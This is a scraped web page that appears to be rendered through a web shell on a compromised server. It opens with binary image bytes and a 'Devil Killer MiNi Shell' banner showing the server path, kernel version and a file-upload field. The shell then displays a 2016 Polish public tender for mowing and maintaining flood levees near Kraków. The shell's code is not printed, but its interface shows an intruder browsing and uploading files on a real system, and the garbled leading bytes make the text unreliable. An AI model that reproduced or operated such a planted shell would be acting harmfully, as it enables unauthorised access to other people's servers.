JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160609/76587-N-2016.html

<p class="kh_header"><b>Kraków: Usługi na prace konserwacyjne zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie zgodnie z poszczególnymi częściami zamówienia</b><br>
<b>Numer ogłoszenia: 76587 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi na prace konserwacyjne zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie zgodnie z poszczególnymi częściami zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 17

1.Koszenie lewego wału potoku Kościelnickiego w km 0+000 - 3+020 
w miejscowości Pobiednik, gm. Igołomia-Wawrzeńczyce
Zakres prac obejmuje: dwukrotne wykoszenie
Mechaniczne wykoszenie porostów przy użyciu ciągnika i kosiarki bijakowej.
Koszenie porostów twardych i gęstych z korony i skarp wału wykaszarkami ręcznymi.
Wygrabienie po ręcznym wykoszeniu.
Uporządkowanie terenu po wykonanych pracach.
2.Mechaniczne wykoszenie lewego wału rzeki Wisły  w km 66+531 - 71+284 w miejscowości Kraków, gm. m. Kraków 
od ulicy Wioślarskiej do ul. Księcia Józefa- Bielany
rozmiar 4.753 km
 Zakres prac obejmuje:
Mechaniczne wykoszenie porostów przy użyciu ciągnika i kosiarki bijakowej.
Uporządkowanie terenu po wykonanych pracach.
3.Koszenie lewego wału rzeki Wisły w km 0+000 ÷ 14+520 
w miejscowościach Pobiednik Mały, Koźlica, Odwiśle, Złotniki, Wawrzeńczyce - gm. Igołomia - Wawrzeńczyce
Rozmiar 14.520 km
Zakres prac obejmuje: dwukrotne wykoszenie
Mechaniczne wykoszenie porostów przy użyciu ciągnika i kosiarki bijakowej
Koszenie porostów twardych i gęstych z korony i skarp wału wykaszarkami ręcznymi
Wygrabienie po ręcznym wykoszeniu
Uporządkowanie terenu po wykonanych pracach
4. Koszenie lewego i prawego wału przeciwpowodziowego rzeki Rudawy (do mostu przy ul. Jesionowej)  m. Kraków, gm. m. Kraków. Wał lewy 0+000-3+650 (rozmiar 3,65 km), wał prawy 0+000-3+629 (rozmiar 3,629 km).
Rozmiar: 7,279 km 
Zakres prac obejmuje: 
-  Wykoszenie porostów ze skarp,  korony i międzywala sprzętem mechanicznym
-  Wykoszenie porostów ze skarp i korony i międzywala przy użyciu sprzętu ręcznego
z wygrabienie po ręcznym wykoszeniu  i wywiezieniem 
- uporządkowanie terenu
Część zamówienia nr 18
1.Konserwacja bieżąca na prawym wale rzeki Wisła w km wału 96+038-115+438 w miejscowości Niepołomice, Wola Batorska, Zabierzów Bocheński i Wola Zabierzowska, gm. Niepołomice
Rozmiar 19.400 km
Zakres prac obejmuje: dwukrotne wykoszenie
wykoszenie skarp i korony wału (kosiarka bijakowa)
2. Konserwacja bieżąca na prawym i lewym wale potok Drwinka w km wału L=12+890-14+600 i P=12+670-14+730 w miejscowości Chobot i Wola Zabierzowska, gm. Niepołomice
Rozmiar 3.770 km 
Zakres prac obejmuje: dwukrotne wykoszenie
wykoszenie skarp i korony wału (mechaniczne - kosiarka bijakowa)
3. Konserwacja bieżąca na prawym wale potok Podłężanka w km wału 0+000-2+700 w miejscowości Niepołomice, gm. Niepołomice
Rozmiar: 2.700 km
Zakres prac obejmuje:dwukrotne wykoszenie
wykoszenie skarp i korony wału (mechaniczne - kosiarka bijakowa)

4.Konserwacja bieżąca na prawym wale potoku Głogoczówka w km 0+000 - 0+470 w m. Głogoczów, gm. Myślenice
Rozmiar:  0,470 km  
Zakres prac obejmuje:
wykoszenie skarp i korony wału (mechaniczne-kosiarka bijakowa)

Część zamówienia nr 19
1.Konserwacja bieżąca- wykoszenie lewego wału potoku  Podłężanka
w km 0+000 -2+850 w miejscowości:  Grabie, Węgrzce Wielkie,  
gm.  Wieliczka.                                         
Rozmiar:  2.850 km
Zakres prac obejmuje: dwukrotne wykoszenie
wykoszenie korpusu wału (skarp i korony wału) mechanicznie - kosiarką bijakową oraz pasa tzw. technologicznego o szer. 1,0m po obu stronach wału 

2. Konserwacja bieżąca - wykoszenie wałów cofkowych rzeki Serafa
prawego w km 0+000 - 3+250    L= 3,250  km
lewego   w km 0+000 - 2+950    L= 2,950  km
w miejscowości: Brzegi, Kokotów ,gm.  Wieliczka   
Rozmiar:  6.200 km
Zakres prac obejmuje:
mechaniczne wykoszenie skarp i korony wałów (kosiarka bijakowa)
oraz pasa tzw. technologicznego o szer. 1,0m po obu stronach wału 
3. Konserwacja bieżąca - wykoszenie wałów cofkowych potoku Zabawka
prawego w km 0+000 -1+211     L= 1,211 km
lewego   w km 0+000 -1+139     L= 1,139  km 
w miejscowości: Brzegi, Kokotów,gm. Wieliczka
Rozmiar:  2,350  km
Zakres prac obejmuje:
mechaniczne wykoszenie skarp i korony wałów - kosiarką bijakową
oraz pasa tzw. technologicznego o szer. 1,0m po obu stronach wału 

4.  Konserwacja bieżąca - wykoszenie wałów cofkowych rzeki Drwina Długa prawego w km 0+000 -1+260    L= 1,260 km
lewego   w km 0+000 -1+270     L= 1,270  km
w miejscowości: Brzegi ,gm.  Wieliczka
Rozmiar:  2,530 km
Zakres prac obejmuje:
mechaniczne wykoszenie skarp i korony wałów - kosiarką  bijakową
oraz tzw. pasa technologicznego o szer. 1,0 m po obu stronach wału
prawego i lewego

5.Konserwacja bieżąca- wykoszenie prawego wału rzeki Wisła w km 90+800 - 96+038 w miejscowości Brzegi , Grabie,gm. Wieliczka
Rozmiar :  5.238 km
Zakres prac obejmuje:
mechaniczne wykoszenie skarp i korony wału kosiarką bijakową
oraz tzw. pasa technologicznego o szer. 1,0 m po obu stronach wału


Część zamówienia nr 20

1. Konserwacja lewego wału rzeki Wisły w km 0+000 - 2+820 m. Nowe Brzesko, Hebdów, gmina Nowe Brzesko, powiat proszowicki
Rozmiar : 2.820 km
Zakres prac obejmuje: dwukrotne wykoszenie
I koszenie
Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy 
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp i korony wału, ciągnik + kosiarka bijakowa 
 II koszenie
Wykoszenie porostów, ręcznie ze skarp, porost gęsty, miękki 
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp i korony wału, ciągnik + kosiarka bijakowa

2.Konserwacja wałów rzeki Szreniawy km 0+000 - 0+960L ,
0+000 - 2+420 P, m. Sokołowice ,Witów, gmina Koszyce, powiat proszowicki
Rozmiar 3.380 km
Zakres prac obejmuje: dwukrotne wykoszenie
I koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, twardy z wygrabieniem
II koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, miękki z wygrabieniem

3. Konserwacja wałów rzeki Wisły km 0+000 - 1+760, 0+000 - 4+300, 0+000 - 0+960, 0+000 - 1+780, 0+000 - 1+360m. Morsko, Sokołowice, Przemyków, Witów, Piotrowice, gmina Koszyce, powiat proszowicki
Rozmiar 10.160 km
Zakres prac obejmuje: dwukrotne wykoszenie
I koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, twardy z wygrabieniem
II koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, miękki z wygrabieniem
4. Konserwacja prawego wału rzeki Nidzicy w km 0+000 - 2+100 
m. Piotrowice, gmina Koszyce, powiat proszowicki
Rozmiar 2.100 km
Zakres prac obejmuje: dwukrotne wykoszenie
I koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, twardy z wygrabieniem
II koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, miękki z wygrabieniem


Część zamówienia nr 21
Konserwacja lewego i prawego wału potoku Ścieklec w km 0+000 - 3+045P; 0+000 - 1+750L, 2+100 - 3+045L, rozmiar 5,74 km, m. Proszowice, Opatkowice, Makocice, gmina Proszowice, powiat proszowicki
Rozmiar 5,74
Zakres prac obejmuje: dwukrotne wykoszenie
I koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, twardy z wygrabieniem
Ręczne ścinanie, krzaki średniej gęstości ze skarp wału według wskazań w terenie z wywiezieniem i zagospodarowaniem materiału z wycinki we własnym zakresie
II koszenie wałów
Wykoszenie porostów, mechaniczne koszenie porostów ze skarp wału,           ciągnik + kosiarka bijakowa 
Wykoszenie porostów, ręcznie ze skarp wału, porost gęsty, miękki z wygrabieniem
2.Konserwacja lewego wału potoku Ścieklec w km 1+750 - 2+100, 
rozmiar 0,35 km, m. Opatkowice, Makocice, gmina Proszowice, 
powiat proszowicki
Zakres prac obejmuje: 
Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy wygrabieniem 
Ręczne ścinanie i karczowanie, krzaki i podszycia średniej gęstości ze skarp wału   z zagospodarowaniem materiału we własnym zakresie 
Karczowanie pni koparką podsiębierną w gruntach wilgotnych, grunt kategorii III-IV, pnie średnicy 30-60 cm 
Wywożenie pni i korzeni w terenie normalnym, średnica 30-60 cm - wywiezienie i zagospodarowanie materiału we własnym zakresie 
Usunięcie warstwy ziemi urodzajnej (humus) przy pomocy spycharek, grubość warstwy do 15cm 
Zasypanie wyrw w skarpach - wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,40 m3, grunt kategorii III 
Zabezpieczenie wyrw w skarpach - wzmacnianie powierzchni skarp geowłókninami, sposób ręczny, geowłóknina 
Zabezpieczenie skarpy siatką z drutu ocynkowanego powlekanego tworzywem  o średnicy 3,6 mm, sposób ręczny - zabezpieczenie wyrw w skarpach 
Zabezpieczenie wyrw w skarpach - formowanie i zagęszczenie nasypów z gruntu złożonego w odkładzie, zagęszczenie mechaniczne, gruntu spoistego warstwami  20 cm, spycharka, ubijak 
Zabezpieczenie wyrw w skarpach - ręczne formowanie nasypów z ziemi leżącej na odkładzie, kategoria gruntu III 
Plantowanie skarp przy robotach wodno - inżynieryjnych, skarpy, kategoria gruntu III 
Obsianie skarp w ziemi urodzajnej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-3, 71.34.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: a) 1.wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 40  000,00 zł. każda /dotyczy części zamówienia Nr 17/ , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.
a) 2. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 50 000,00 zł. każda /dotyczy części zamówienia Nr 18/ , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.
a) 3. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 25 000,00 zł. każda /dotyczy części zamówienia Nr 19/ , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.
a) 4. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 45 000,00 zł. każda /dotyczy części zamówienia Nr 20/ , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.
a) 5. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w tym co najmniej: 1 pracę w zakresie konserwacji ,budowy, odbudowy lub remontów obwałowań przeciwpowodziowych o wartości co najmniej 30 000,00 zł. każda ,1 pracę w zakresie wykoszenia wałów przeciwpowodziowych /dotyczy części zamówienia Nr 21/ , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: 1.wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi 
do wykonania zamówienia a w szczególności; co najmniej 1 kosiarka bijakowa /dotyczy części zamówienia Nr 17,18,19,20 / 
2. wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi 
do wykonania zamówienia a w szczególności; co najmniej 1 kosiarka bijakowa,1 koparka /dotyczy części zamówienia Nr 21/.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony jeżeli wykonawca wykaże ,że 1. dysponują osobami posiadającymi kwalifikacje zawodowe, doświadczenie , wykształcenie i uprawnienia niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania robotami budowlanymi na stanowisku: kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych. W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.) Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
